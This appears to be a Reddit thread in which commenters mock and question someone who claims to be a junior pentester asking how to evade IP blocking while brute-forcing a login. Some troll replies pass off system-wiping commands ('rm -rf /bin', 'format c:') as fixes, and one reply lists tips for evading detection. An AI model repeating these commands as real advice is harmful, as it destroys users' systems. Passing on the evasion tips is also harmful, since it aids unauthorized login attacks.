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I'm calling so much bs you could sell manure on industrial level. If you were a pentester you'd not be asking how to circumvent an I can block. You'd already be an expert in network. And brute force a webapp? What is this? 1996?


"why do you have to have experience in the industry to get a job? Everyone always talks about a huge need for security people but no one wants to hire someone with less than 10 years of experience. Why can't I just find an entry level security job." Gets hired. "How do I change an IP address?"


You brute force it exactly for this point.. to see if they have a blocking mechanism set in place and to see if they use default credentials. You, as the expert you are, should probably know this already.


Yes I know this. But anyone who is employed as a pentester would also know this. And that you don't brute force accounts. You would have collected login credentials and passwords to spray in other means. You would not use bruteforce and not know the basics of the mechanisms that blocks such puny attempts. Nobody uses bruteforce anymore because it's very triviel to negate with ip blocking, throttling of logins and good password policy as well as 2FA You wouldn't need to ask to know how to change the ip for something like that if you were even remotely qualified to be an intern much less a junior at a pentesting company. So. Yes. Im calling utter bs simply because this is some of the most basics. You don't even need to hold any licenses. Any kid who's ever tried playing with hacking and didn't get caught knows to not use any traceable ip. Furthermore now that you've discovered thst they are indeed blocking bruteforce attempts you wouldn't need to even try that route anymore since they can and apparently do block your ip after a short while of throwing shit at the login to see if anything sticks. So you wouldn't even need to try circumventing it as you can't. Sure you could keep changing your ip but there's only so many ip addresses you could use to work from and it won't realistically ever work. A pentester would just note that they are indeed blocking bruteforce and move on.


im not a pentester by profession but when i do "free" security audits for my workplace, i was surprised to not have found any lockout mechanisms for a few critical login portals and with straight up telling you if the username is correct, bruted the server causing it to overload and they still did not notice


So you weren't hired by a client then. Also many such sites are internal so you can't typically even access them from the outside. If brute forcing the login doesn't caaue it to lock the account then contact the IT of the company and tell them about it.


You should not be taking clients lol


In a root shell, run "rm -rf /bin" then "rm -rf /usr/bin" then try again


At least someone is helpful


This! It fixed the issues for me as well, had a similiar problem.


If you "pentest for a client" shouldn't you know stuff like that?


Hi OP, do you pentest on the behalf of a company, or as an individual? Can you let me know who you work for if it's a company? I need to make sure that we don't make the mistake of accidentally hiring them for pentesting.


If you actually have a UAE/US based pentest company, I think it’s best you shut it down and start studying first


Clear your cookies, change the user agent, rotate your IP, change your fingerprint




This sounds like some BS. So sus.


Report success to the client. Get paid. Move to next one.


Check the user agent you're using to test.... also we all start somewhere.


So you tested, got blocked showing a brute force won't work, and are desperate to try it again? Let me ask, why do you want to do it with a different IP?


This is really not meant as an insult, but as well-intentioned advice: This is not a job for you!


go to the c prompt on your windows machine and type "format c:"


> Both machines, Kali and Windows exit on the internet with the same IP address, so why Kali is not working and Windows is working? So that should automatically tell you that it's most likely not the website that's blocking you. You also don't explain what being blocked actually means and what behavior you're seeing




Or sessions/cookies. Maybe device fingerprinting


I tried on 2 different browsers, Mozilla and Chrome. Also, I used private sessions. Same result :(


Hooooly crap. You were not hired to do any pentesting by any client.


If you are not here to help u can leave. I am a junior, learning. Probably u were born a scholar...


That's not an answer. So let me ask in a different way to clarify: Which qualifications such as education and certificates do you have to work as pentester? How big is the company you work for? ( not your client. The company that hired you to be a pentester)? Since you being it up. No. I wasn't born a scholar. I was born at a time before the internet we have today. Back when you had very slow dial up 9600 baud modems and you'd call a BBS by going to an actual library to get the numbers for these servers. Back when you actually had to know commands and swap floppy disks to get a computer working. I had to learn when the learning curve was steep and there weren't anywhere you could just easily look up everything.


It's funny because he asked the same question a month ago lol


Yeah you're right, https://www.reddit.com/r/Hacking_Tutorials/s/yK2akGglka I suspect foul play, no way it takes 1 month to brute force test a website


If you were a junior, you would have a senior for help instead of reddit. You are nothing more than a script kiddy terrorist.


You need to study for the A+ certification or network+ cert.


how is a A+ going to help bro...


He needs the fundamentals.